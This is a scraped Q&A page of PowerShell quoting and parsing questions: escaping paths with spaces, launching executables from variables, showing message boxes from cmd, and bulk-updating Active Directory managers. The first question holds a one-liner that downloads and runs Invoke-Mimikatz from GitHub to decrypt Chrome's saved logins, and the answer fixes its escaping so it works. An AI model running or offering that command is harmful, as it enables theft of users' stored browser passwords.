Mimikatz - problem with handling spaces in the file path Dpapi::chrome [duplicate] - powershell

This question already has an answer here:
Powershell in Jenkins escaping characters for path
(1 answer)
Closed 1 year ago.
Why in mimikatz/kiwi cannot process first space when opening chrome database "Login Data" ?
Example:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""
Error:
Invoke-Mimikatz : A positional parameter cannot be found that accepts argument 'Data\Default\Login'.
At line:1 char:146
+ ... katz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappda ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-Mimikatz], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Mimikatz
enter code here
I will be very happy if someone helps, I have already tried all.

You need to escape the " inside the string argument by doubling them ("") or prefixing them with a single ` (PowerShell doesn't care about \):
"dpapi::chrome /in:""%localappdata%\Google\Chrome\User Data\Default\Login Data"""
# or
"dpapi::chrome /in:`"%localappdata%\Google\Chrome\User Data\Default\Login Data`""

Related

PowerShell command cannot parse string literal and finds unknown positional parameter

I am trying to run a PowerShell command (DesktopAppConverter) and I'm getting an error saying it is finding an unknown positional parameter.
DesktopAppConverter -AppInstallPath 'C:\Program Files (x86)\Search Deflector' -Destination '.\AppxPackage\' -Installer '.\ClassicInstaller\SearchDeflector-Installer.exe' -InstallerArguments '/COMPONENTS="main"','/VERYSILENT','/DIR="C:\Program Files (x86)\Search Deflector"' -MakeAppx -PackageName '3945spikespaz.SearchDeflector' -Publisher 'CN=69331A0A-1F10-4A10-8A28-3627A09E25FD' -Version '0.0.3.0' -AppId 'SearchDeflector' -AppDisplayName 'Search Deflector' -AppDescription 'A small program that forwards searches from Cortana to your preferred browser and search engine.' -PackagePublisherDisplayName 'spikespaz' -PackageArch 'x86' -Sign -Verbose
I also tried replacing the single quotes with double quotes and escaping the quotes in the InstallerArguments array with backticks. No dice.
C:\Program Files\WindowsApps\Microsoft.DesktopAppConverter_2.1.4.0_x64__8wekyb3d8bbwe\DesktopAppConverter.ps1 : A positional parameter cannot be found that accepts
argument '/VERYSILENT'.
At line:1 char:1
+ &'C:\Program Files\WindowsApps\Microsoft.DesktopAppConverter_2.1.4.0_ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [DesktopAppConverter.ps1], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,DesktopAppConverter.ps1
My guess is that it's splitting the parameters at the vert first space in the AppInstallPath string.

how to execute an exe with variable value for path and arguments

I'm trying to execute in my powershell script the command below :
D:\Apps\Documentum\product\7.3\bin\idql.exe -udmadmin -pPassword dctm04 -RC:\temp\documentum\session_list.txt -w20 > C:\temp\documentum\session_logstash.txt
In my powershell script I do that:
$DOCBASE="dctm04"
$USER_DOCBASE="dmadmin"
$USER_PWD="Password01"
$IDQL_PATH="D:\Apps\Documentum\product\7.3\bin"
$QRY_SESSIONS="C:\temp\documentum\session_list.txt"
$QRY_LOG_SESSIONS="C:\temp\documentum\session_logstash.txt"
$IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 > $QRY_LOG_SESSIONS
But it doesn't work properly, I receive the error below :
At C:\temp\documentum\Generate.ps1:49 char:13
+ $IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 ...
+ ~~~~~~~~~
Unexpected token '\idql.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : UnexpectedToken
I think, i don't use variable properly on my command.
Please note my powershell version is :
PS C:\temp\documentum> $PSVersionTable.PSVersion
Major Minor Build Revision
----- ----- ----- --------
4 0 -1 -1
could you give me the solution in order to solve my problem
The reason is that combining a string to executable name makes no sense to Powershell's parsing rules. Use the call operator & or Invoke-Item. Like so,
$ssms="C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\ManagementStudio"
PS C:\> $ssms\ssms.exe
At line:1 char:6
+ $ssms\ssms.exe
+ ~~~~~~~~~
Unexpected token '\ssms.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
C:\>& $ssms\ssms.exe
# Launches SSMS succesfully
C:\>Invoke-Item $ssms\ssms.exe
# Launches SSMS succesfully
There's nice a document about running executables.

How to create a messagebox as an argument to powershell.exe?

How can I provide arguments to powershell.exe in order to spawn a message box? The key phrase here is arguments to powershell.exe, not from within a .ps1 script and also not from within the Powershell prompt itself. I currently have this but it is producing errors:
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms"); [System.Windows.Forms.MessageBox]::Show("Test!!!")"
I have also tried without -Command and with Invoke-Expression, with and without double quotes surrounding.
Errors created:
At line:1 char:51
+ [System.Reflection.Assembly]::LoadWithPartialName(System.Windows.Form ...
+ ~
Missing ')' in method call.
At line:1 char:51
+ ... eflection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syst ...
+ ~~~~~~~~~~~~~~~~~~~~
Unexpected token 'System.Windows.Forms' in expression or statement.
At line:1 char:71
+ ... flection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syste ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Missing ')' in method call.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~~~~~~~
Unexpected token 'Test!!!' in expression or statement.
At line:1 char:121
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
This is a quotation problem. Using the same double quote " in both argument and its contents messes up the content. As a work-around, use single quotes within the Powershell command and double quotes around the whole -Command parameter. Like so,
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Test!!!')"
That being said, Add-Type -AssemblyName is IMAO prettier way to load assemblies. Like so,
powershell.exe -Command "add-type -assemblyname System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Test!!!')"

How to execute PowerShell Net MessageBox in cmd/batch

I have a batch file with lot of stuff. I there is one Alert Window with info for user.
On Windows Pro I'm using Msg command for it and it works fine.
On Windows Home there is no Msg, so I got the idea to use PowerShell instead:
[System.Windows.Forms.MessageBox]::Show("my text")
which works fine in PowerShell.
-However, when I try to use it in batch or execute it directly in Cmd, I only get the text:
C:\Windows\System32>powershell {[System.Windows.Forms.MessageBox]::Show("\""my text"\"")}
[System.Windows.Forms.MessageBox]::Show("my text")
Or I get errors:
C:\Windows\System32>powershell -command [System.Windows.Forms.MessageBox]::Show("my text")
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Missing ')' in method call.
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~~
Unexpected token 'my' in expression or statement.
At line:1 char:48
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
or
C:\Windows\System32>powershell -command "& {[System.Windows.Forms.MessageBox]::Show('my text')}"
Unable to find type [System.Windows.Forms.MessageBox].
At line:1 char:4
+ & {[System.Windows.Forms.MessageBox]::Show('my text')}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Windows.Forms.MessageBox:TypeName) [],
RuntimeException
+ FullyQualifiedErrorId : TypeNotFound
What should I do to get it to work?
(without rewriting the whole script to PowerShell, that is)
As TheMadTechnician stated, you may need to load it first.
This is effectively the same answer as theirs just over a couple of lines:
#Echo Off
PowerShell -Command^
"[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')|Out-Null;"^
"[System.Windows.Forms.MessageBox]::Show(\"my text\")"
Pause
…and whilst double quotes around my text is not necessary, I've used them to show you the escapes.
You need to load the type before you can invoke it. You can do this:
powershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('my message')"

PowerShell Bulk update Active Directory Managers field [duplicate]

This question already has an answer here:
You cannot call a method on a null-valued expression
(1 answer)
Closed 5 years ago.
I'm trying to update our managers field in our active directory and have a script
the input file looks like this
Firstname.LastnameEmployee;firstname.lastnameManager
Here is the script I'm using...
This is the error I'm getting
You cannot call a method on a null-valued expression.
At line:26 char:5
+ $ObjSearchemployee.Filter = "(&(objectCategory=person)(objectClass=user)(sAM ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:31 char:9
+ $ObjSearchmanager.Filter = "(&(objectCategory=person)(objectClass=user)( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
###############################################################
# Update_Manager_v1.0.ps1
# input : n/a
# output : none (logs)
# Version 1.
# Changelog : n/a
# MALEK Ahmed - 02 / 06 / 2013
###################
##################
#--------Config
##################
$adPath="LDAP://DC=local,DC=com"
##################
#--------Main
##################
#LDAP connection
$objDomain=New-Object System.DirectoryServices.DirectoryEntry($adPath)
#Doing an LDAP search
$ObjSearchemployee=New-Object System.DirectoryServices.DirectorySearcher($ObjDomain)
$ObjSearchmanager=New-Object System.DirectoryServices.DirectorySearcher($ObjDomain)
#Operations on user accounts
Import-Csv .\input.csv -Delimiter ';' | Foreach-Object {
$ObjSearchemployee.Filter = "(&(objectCategory=person)(objectClass=user)(sAMAccountName="+ $_.employee.trim() +"))"
$allSearchResultemployee = $ObjSearchemployee.FindAll()
foreach ($objSearchResultemployee in $allSearchResultemployee)
{
$objUseremployee=New-Object System.DirectoryServices.DirectoryEntry($objSearchResultemployee.Path)
$ObjSearchmanager.Filter = "(&(objectCategory=person)(objectClass=user)(sAMAccountName="+ $_.manager.trim() +"))"
$allSearchResultmanager = $ObjSearchmanager.FindAll()
foreach ($objSearchResultmanager in $allSearchResultmanager)
{
$objUsermanager=New-Object System.DirectoryServices.DirectoryEntry($objSearchResultmanager.Path)
$objUseremployee.manager = $objUsermanager.distinguishedname
}
$objUseremployee.CommitChanges()
"" + $objUsermanager.displayName + " is now the manager of " + $objUseremployee.displayName + ""
}
}
$.Employee.trim() is the problem since you do not have a column header of "Employee" as per your source example. See You cannot call a method on a null-valued expression.
Assuming your first column is for the samaccountname then you should change that to $_.Firstname.LastnameEmployee.trim() else you need to redefine how your search is being done or update your source file to contain the relevant information and get your code to match.
As the error suggests you will have the same problem with $_.Manager.trim()